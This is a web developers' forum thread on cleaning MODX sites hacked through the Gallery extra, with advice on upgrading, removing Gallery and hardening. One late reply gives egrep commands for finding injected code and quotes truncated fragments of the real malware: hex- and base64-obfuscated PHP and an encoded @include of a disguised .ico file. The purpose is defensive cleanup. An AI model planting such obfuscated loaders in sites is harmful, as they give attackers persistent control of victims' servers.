Hacked Site. Issues restoring function

2 Posts

prudolph Reply #1, 5 years, 9 months ago

Site was not running updated version of MODX and was hacked. Site hosted at Godaddy, they have attempted 3 times to clean the malware but it persists. Have upgraded the site to MODX 2.6.5 and removed malware. Currently site will not load either front end or backend.
www.grassynarrows.com. Does anyone have any suggestions where to start.

[ed. note: prudolph last edited this post 5 years, 9 months ago.]

185 Posts

Anton Tarasov Reply #2, 5 years, 9 months ago

Hi @prudolph,

they have attempted 3 times to clean the malware but it persists

Do you mean it was deleted but returned again and again? I believe so as I see that too.

Does anyone have any suggestions where to start.

There are two ways:
1. Auto malware search using various of tools (like hosting Ai-bolit or other, you even can download all files and search locally with anti-virus)
2. Manual search if you know what annd where to check(f.e. last few days I've updated about 20-30 websites so I know where to check)

After that MODX 2.6.5 update + Gallery update up to 1.7.1 (if used).

This is required minimum. There are more stronger methods (first of all please read this f.e. https://docs.modx.com/revolution/2.x/administering-your-site/security/hardening-modx-revolution) to prevent this for future.

Anton Tarasov
MODX Developer

Email: [email protected]
Web: antontarasov.com

24,544 Posts

BobRay Reply #3, 5 years, 9 months ago

I would uninstall *and remove* the Gallery extra (if you have it) before doing anything else to prevent a new hack from occurring while you're upgrading.

Did I help you? Buy me a beer
Get my Book: MODX:The Official Guide
MODX info for everyone: http://bobsguides.com/modx.html
My MODX Extras
Bob's Guides is now hosted at A2 MODX Hosting

42 Posts

voklee Reply #4, 5 years, 9 months ago

Bob is correct. I have +30 Modx installs after the outbrake i updated them all to 2.6.5. Some were allready infected.(5)
When i started updating i missed out the sentence that said "upgrade Gallery to 1.7.1".
All websites i forgot to update Gallery are hacked now.

Update or remove Gallery is a MUST DO!

185 Posts

Anton Tarasov Reply #5, 5 years, 9 months ago

Quote from: BobRay at Jul 28, 2018, 08:16 PM

I would uninstall *and remove* the Gallery extra (if you have it) before doing anything else to prevent a new hack from occurring while you're upgrading.

That makes sense, I saw this too - if you aren't fast enough website can be affected via Gallery

Anton Tarasov
MODX Developer

Email: [email protected]
Web: antontarasov.com

42 Posts

voklee Reply #6, 5 years, 9 months ago

In my practice, i have updated all sites to 2.6.5. and directly after install upgrade Gallery to 1.7.1.
All sites remain clean so far.
The (2) websites i skipped update gallery to 1.7.1. were hacked in 1-2 days because of Gallery (they were 2.6.5)

322 Posts

rainbowtiger Reply #7, 5 years, 9 months ago

I have websites that were hacked, then I cleaned them all up (updated to 2.6.5., updated Gallery to 1.7.1, deleted all files in the Gallery cache folder (where the hacker's php file was installed), deleted all the spurious index files, fixed MODX index files that were corrupted, tracked down and delete all php files with gibberish names, and deleted the .ico file that was uploaded. Most sites are fine now, but SOME websites were reinfected the next day. Is there something else this hack does that I don't know about? Some other file or type of file that triggers reinfection? The php file does NOT reappear in the Gallery cache folder, so something else is going on.

24,544 Posts

BobRay Reply #8, 5 years, 9 months ago

I'm not sure, but from what I've read, there are two hacks going on. One targets Gallery via the connectors directory (renaming it would protect you), and a second hack that targets a vulnerability in the core (moving the core above the web root and renaming it would protect you from that one).

Since you're already running 2.6.5, though, it's possible that there's an unfixed vulnerability in Gallery or the core. It's also possible that you missed one of the hacker's files -- it would be easy to do since there are thousands of files in a MODX install and some compromised files could have innocent-looking names.

One danger is that once you are hacked, the hacker could easily access the config.inc.php file, which would give away your DB credentials.

Did I help you? Buy me a beer
Get my Book: MODX:The Official Guide
MODX info for everyone: http://bobsguides.com/modx.html
My MODX Extras
Bob's Guides is now hosted at A2 MODX Hosting

2 Posts

prudolph Reply #9, 5 years, 9 months ago

I have seeming gotten the site back up with minimal damage. The hacks have not returned after 3 days. I did have Gallery installed but had updated it to 1.7.1 per the initial repair instructions. I finally removed it. I ended up renaming and changing the name on the database along with all the other "Hardening" suggestions provided above. Thank you all for your input, I appreciate it.

15 Posts

remek555 Reply #10, 5 years, 9 months ago

If you're working on a linux machine (or VM ofcourse) you can try to manually remove it.
Download the site and in command line:

egrep -Rln "/\*[A-Za-z0-9]{2,12}\*/" /path/to/the/site > __include.log
- searches for /*ABC123*/ (ABC123 is just an example)

egrep -Rl "(eval\(|eval/)" /path/to/the/site --exclude=\*.{js,css} > __eval.log
- Searches for command php eval in the files.

Then you have to manually edit the files.
Delete anything that looks unreadable like

$GLOBALS['of4721'] = Array();global $of4721;$of4721 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['d299'] = "\x6f\x64\x69\x4c\x55\x61\x65\x77\x4a\x49\x52\x35\x3d\x6d\x54\x63\x2e\x4b\x24\x5c\x41\x4f\x30\x23\x7a\x73\x5d\x44\x46\x7e\x3a\x58\x6e\x50\x39\x2a\x70\x78\x3b\x2d\x67\x56\x4d\x6c\x33\x38\x51\x3f\x31\x79\x48\x45\x43\x68\x5f\x57\x62\x34\x42\x29\x72\x66\x2f\x28\x21\x3c\x76\x71\x25\xa\x59\x2b\x60\x32\x22\x6a\x5a\x74\x53\x47\x36\x40\x3e\x20\xd\x2c\x5b\x75\x27\x7c\x7b\x9\x26\x4e\x5e\x6b\x37\x7d";$of4721[$of472

$_X='Pz48P3BocA0KDQovKioNCiAqIEAxM3RoMnIgSWtyMW0gQUxJDQogKiBAYzJweXI0Z2h0IGEwNmENCiAqLw0KQGQ1ZjRuNSgnVkVSU0lPTicsJzYuMCcpOw0KQDVycjJyX3I1cDJydDRuZyhFX0FMTCBeIEVfTk9USUNFKTsNCkBzNXNzNDJuX3N0MXJ0KCk7DQpANG40X3M1dCgnNXJyMnJfbDJnJyxOVUxMKTsNCkA0bjRfczV0KCdsMmdfNXJyMnJzJywwKTsNCkA0bjRfczV0KCdtMXhfNXg1YzN0NDJuX3Q0bTUnLDApOw0KQHM1dF90NG01X2w0bTR0KDApOw0KQHM1dF9tMWc0Y19xMzJ0NXNfcjNudDRtNSgwKTsNCg0KNGYoZzV0X20xZzRjX3EzMnQ1c19ncGMoKSkgew0KCWYzbmN0NDJuIG0xZHN0cjRwc2wxc2g1cygkMXJyMXkpIHsNCgkJcjV0M3JuIDRzXzFycjF5KCQxcnIxeSkgPyAxcnIxeV9tMXAoJ20xZHN0cjRwc2wxc2g1cycsICQxcnIxeSkgOiBzdHI0cHNsMXNoNXMoJDFycjF5KTsNCgl9DQoJJF9QT1NUID0gbTFkc3RyNHBzbDFzaDVzKCRfUE9TVCk7DQp9DQokZDVmMTNsdF8xY3Q0Mm4gPSAnRjRsNXNNMW4nOw0KJGQ1ZjEzbHRfM3M1XzFqMXggPSB0

/*fb491*/

@include "\057h\157m\145/\163t\162o\156y\057i\156t\145r\143i\164y\056p\154/\167w\167/\157b\162a\172y\057d\172i\141l\040p\162a\163o\167y\057M\141j\303³\167k\141 \0613\047/\0566\061f\143f\065f\141.\151c\157";

/*fb491*/

Update to 2.6.5 and Gallery to the newest, ideally on local machine. Delete site from the server and reupload.

[edit] you can also overwrite with newest MODX before doing searches. Should be less files to edit.